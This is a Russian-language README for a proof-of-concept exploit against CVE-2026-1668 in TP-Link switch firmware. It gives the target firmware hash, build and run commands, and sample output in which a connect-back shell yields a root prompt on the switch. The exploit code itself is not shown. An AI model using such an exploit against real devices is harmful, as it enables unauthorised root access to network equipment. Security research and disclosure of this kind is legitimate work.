
Эксплойт proof-of-concept для CVE-2026-1668 в прошивке коммутатора TP-Link, доставляющий MIPS-полезную нагрузку, которая даёт root-оболочку на уязвимых устройствах.
Это proof-of-concept эксплойт для CVE-2026-1668. Он предназначен исключительно для образовательных целей. Пожалуйста, не пытайтесь эксплуатировать системы, которые вам не принадлежат или на эксплуатацию которых у вас нет явного разрешения.
Этот proof-of-concept был разработан против образа прошивки со следующим хешем SHA256: 4b862b8dd7fde44fa57a39b35b562f21878dd6abb8e92ccd9cdef571ed60d544.
Названия прошивок, которые, как известно, соответствуют этому хешу (список неполный):
Более ранние версии прошивок, вероятно, также уязвимы, но могут потребовать незначительных изменений в полезной нагрузке эксплойта.
Объяснение того, как работает полезная нагрузка, можно найти в этом посте блога.
Для сборки полезной нагрузки требуется инструментальная цепочка MIPS Linux GCC. В Ubuntu 24.04 её можно установить с помощью sudo apt install gcc-mips-linux-gnu.
$ make
Этот эксплойт должен быть запущен до того, как HTTP-сервер обработает свой первый запрос (то есть при свежей загрузке).
$ ./run.sh
Скрипт должен предоставить вам root-оболочку. Если нет, эксплойт не сработал.
[*] Sending payload
HTTP/1.1 200 OK
Server: Web Switch
Connection: close
Content-Type: application/json
{"data":{"mByCtrl":0,"includePrivacyPolicy":0,"includeAutoCheck":1,"includeSshController":1},"errorcode":0,"success":true,"timeout":false}
[*] Connecting back to get a shell
/bin/sh: can't access tty; job control turned off
/etc #